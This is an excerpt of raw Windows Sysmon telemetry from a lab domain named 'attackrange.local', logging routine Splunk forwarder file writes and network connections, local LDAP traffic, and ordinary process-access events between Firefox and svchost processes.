Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CD0A8B3BA0A36A46E8EADA705ED9B6F,SHA256=5D31128654FD8A062EB07CDC5CE5F694F5EFDE3C7B0B4F9ABEBCF1378A571C67,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104958Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:23.886{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55421-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104957Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:25.352{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88EB6036BBA06D3EE19EDC98327004CD,SHA256=C0994E0B939DB0FD66FB2C5CD9D0D6913CA000EAB68500AA480ECABB6E138C17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151554Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:25.960{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E79A95757E96AEC8DAB7E5719E4D2D84,SHA256=0F3F5F76D7327972AA705C72BD8E7942DA04561D895795228FA52FFACC8F0894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104959Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:26.720{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57E502CB5AA884E2C4E03931CA6590DC,SHA256=4AE2A05A00CA1B5E76BAA4FF436CB1E45303780C8FE71AD66B7F0553B2A85D81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151557Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:26.994{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6EEBAD0500428F6E23F708233B131A9,SHA256=5884458F70C0AD49823DFAD210FCC156A792ADC494B585E473278E47D3CFEB44,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151556Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:26.628{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151555Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:26.597{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104960Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:28.086{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DD10F6AD7F33D25D2935B65696CF137,SHA256=EA45497223C080499F5AA14D7034C882F7D85B754EF7C69869891AA987DAE48E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151560Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:28.294{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57C921490CA8B07BFB80F6EC545B8582,SHA256=5B077917D8207CBE425B32523E24D33A5349125C374C437A537A62522B736B3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151559Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:28.293{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD94CE1F36400C225A11E417F0F58A67,SHA256=B3FF63C7590E32CD5E41B98FEC7CB3CA0AF0EA86A31E49D252D56FD9095B8FEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151558Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:28.011{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AFBED3B7508FBE65DB340A8D1CA4C1,SHA256=E982E19745DCB92B5336382AB22C7041D194767EA6443FD9518D4E04DA580FDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104961Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:29.769{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3E5F5DC689E45A2EE03400B8EA62AD5,SHA256=9B040E813C18A0BCBFDF65AF4D8E8DCD1193FAE1B6FC62D9081898553AA42362,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151562Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:27.079{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58407-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151561Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:29.013{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=036B3F0EBED44115313646CA4BAFE40E,SHA256=D01BC8382ADC0565E824C2D592C925FEF819609F5812B1AA25D784231DF0D04C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151563Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:30.028{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D88E85524C8CF3F083201901BEEB5F0,SHA256=1B78AD216FF1C555ECC5C33E615DD952CD0DA9EE094A1616A0F1BE92C1A49C9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104963Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:31.608{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72C814F146115D5032DB8BCDCCE606C8,SHA256=161E750A4EBD9A01FF56A096A6C698EAD80696D1B302F875857EA8DC00797F5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104962Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:29.866{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55422-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151564Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:31.059{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8FC5DAE9FC2DB610A57B4D8CF61236B,SHA256=2F7ABAA6F1D89A910ECEF87EC7ED812A6DBFF0202AE7A49791C9B5D4A0C707B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151565Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:32.074{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C48FC990A6ABF9A3D1ED3FF2671A705,SHA256=659669AD28D668A024DA634464C5355AD49950529E5FA4568618A0348737DD08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104965Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:33.003{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9CD56703663F3FE30269E63D6BE1BF55,SHA256=0238FF69129BD2FE3A696FF5B3E7F2110CF52C6061D64F97A97EAF450F7F3D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104964Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:33.000{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D23A1F1B52AB9638185DC65C3BB3DBF,SHA256=75D8BF6AF4026B0B5AAC0799EDA0E154AE61C52EF3BB8F8B74C7E509C7C06464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151566Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:33.126{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62A0183B73C981036BD210CD3590E746,SHA256=A0AB54AE46EBFEC50DDC6956DF35081CD21EC01C8E56151A23B0A5052A415AD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104966Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:34.365{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5241C9E88158D83CDE0D7CDD2C2C93,SHA256=E9C48A0303ED8904FE146CD65DAD783D9F51A45FFD97CC68456A1F4C000C9DA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151569Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:34.225{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3816AC5ED109ABC22A6E46E7F5EAF886,SHA256=948AF09F9627E00E4F977BCA3FAD7116DD5115C2834FDE2716BC51FF6901B6AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151568Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:34.225{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57C921490CA8B07BFB80F6EC545B8582,SHA256=5B077917D8207CBE425B32523E24D33A5349125C374C437A537A62522B736B3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151567Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:34.156{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=879C619B5EE4F8F5FECF21191E9E8D14,SHA256=C731EBF124035D750A3267E67191D3336FEAD67464F642DD538F8EFDC45B0638,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104967Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:35.727{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC5E3480AE69EB0126059C354E4FBCA,SHA256=F8E9BD04FD4B1C92AC31451E9A09FB7773D53387EE9CDCE4A43C88E85DF261D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151571Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:33.012{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58408-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151570Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:35.171{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A12854AA3348E18B8F55FC829E56A2,SHA256=389DE046DFE516C9BF35B458C6301344D454E7345248D90DA36166303D051F1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151572Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:36.188{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DAF5FE490A4CA99DD49A31F6039E19E,SHA256=AE9376592E5FDDAD19DDC4BBBEF577B4E93D76F8006A8F64FC0F0548A514C43D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104969Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:35.807{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55423-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104968Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:37.094{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EB535C54E84B0928BFAB5E6DC990F2,SHA256=7C421C1A1A13FEFFA81D1537D937460676A75830F4B5D98A346FCF71836F3145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151573Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:37.191{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1F71C945D02F91BD475E0AB848D7C02,SHA256=153CBF6DCEAA6CAA2F34DB997A404B300C843A8B56FEC090ECDB7F65E5255436,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104972Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:36.245{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55424-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 354300x8000000000000000104971Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:36.245{54715871-FD28-60C9-2600-00000000CF01}2840C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55424-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 23542300x8000000000000000104970Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:38.454{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96796D65F83277C305A1B20E0CC0DFB0,SHA256=CAB61D3966F25663A4C392B97BCA76BF5F6F58F0559F15F2AFD06774668325AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151574Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:38.206{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D5F54E07317F0A16244297595033FF4,SHA256=8A285ECD8F5382BA6CBF5CAD2050F168F59B0C2CD6D9E5C97872882D2E7C9580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104976Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:39.816{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BC0A307D7E7892B7C70AD958BF944D,SHA256=3E05A7E9CE463BC9374EB6E9B6ACD85EA10A5B1182BCC02F8331FFDFF7F50E34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104975Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:39.804{54715871-FD18-60C9-0D00-00000000CF01}9081336C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2A00-00000000CF01}2944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104974Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:39.804{54715871-FD18-60C9-0D00-00000000CF01}9081336C:\Windows\system32\svchost.exe{54715871-FD18-60C9-1100-00000000CF01}404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104973Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:39.804{54715871-FD18-60C9-0D00-00000000CF01}9081336C:\Windows\system32\svchost.exe{54715871-FD18-60C9-0F00-00000000CF01}100C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151575Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:39.221{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=067AE6E19BDA120F1568AF376EDD720B,SHA256=9203AB0087DE0264F9E8DE582AE8C93DC043C6A272DAD4B0F856B52DD3A31C16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151578Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:40.221{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC875CFAA91D3AC8723E0F7C81764E41,SHA256=CF868E5918A2EE366CEE865249F758F921DEC6C7B93D32B8BBA1539DB34EBABA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151577Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:40.037{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8CAE06F340ABCA9C4FB143EB2979FF0,SHA256=D6D528E1D362690D9EF16771AD5E97CFC7DE845CA7DF4645A994BFA8202C5D39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151576Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:40.037{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3816AC5ED109ABC22A6E46E7F5EAF886,SHA256=948AF09F9627E00E4F977BCA3FAD7116DD5115C2834FDE2716BC51FF6901B6AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104980Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:41.892{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACE3C5099C648404FACC360335E48297,SHA256=328F259896DB252792AEE475CA96B22C524F239D4B17EF3DDB669A6930C5BA25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104979Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:41.208{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76B2E0F56DE8DC27F250855D09F793E3,SHA256=24B6A8820B26774107EFD1FBEAF59BD64B3383F75EFBBD4DBE8421F24B2E40D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104978Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:41.102{54715871-FD18-60C9-0D00-00000000CF01}9081336C:\Windows\system32\svchost.exe{54715871-FD18-60C9-0C00-00000000CF01}848C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104977Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:41.102{54715871-FD18-60C9-0D00-00000000CF01}9081336C:\Windows\system32\svchost.exe{54715871-15B0-60CA-2E08-00000000CF01}4504C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000151580Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:38.856{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 